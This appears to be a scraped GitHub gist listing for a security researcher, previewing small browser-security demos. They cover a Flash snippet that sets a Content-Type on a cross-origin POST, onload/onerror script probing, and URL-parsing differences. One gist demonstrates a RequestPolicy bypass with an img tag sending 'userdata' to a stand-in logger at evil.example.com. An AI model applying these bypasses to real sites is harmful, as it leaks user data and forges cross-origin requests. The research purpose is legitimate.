Jordan Milne JordanMilne

  • Canada
View testing
aesKeyStringFOOBARBAZQUUXquuxy
aaaa
@JordanMilne
JordanMilne / content-type.mxml
Created Jan 16, 2014
setting the Content-Type header with flash
View content-type.mxml
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
View gist:8032399
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
@JordanMilne
JordanMilne / gist:7704136
Created Nov 29, 2013
Demonstration of a RequestPolicy bypass using jar: URIs
View gist:7704136
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
@JordanMilne
JordanMilne / gist:6459317
Created Sep 6, 2013
Demonstrates abuse of script error handling
View gist:6459317
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
@JordanMilne
JordanMilne / cookie_jar_tests.json
Created Sep 14, 2015
Comparing the cookie parsing behaviours of various HTTP services
View cookie_jar_tests.json
@JordanMilne
JordanMilne / go-1.3.3.txt
Last active Sep 13, 2015
URL parsing changes from Go 1.3.3 to 1.5.1
View go-1.3.3.txt
Original: http://example.com/foo/%2F/bar
Scheme: http
Hostname: example.com
Path: /foo///bar
Unparsed: http://example.com/foo///bar
Original: http%3A/%2Fexample.com/baz
Scheme:
Hostname:
Path: http://example.com/baz
View foo.py
>>> urlparse.urljoin("https://base.example.org/", "/foobar")
'https://base.example.org/foobar'
>>> urlparse.urljoin("https://base.example.org/", "//foobar")
'https://foobar'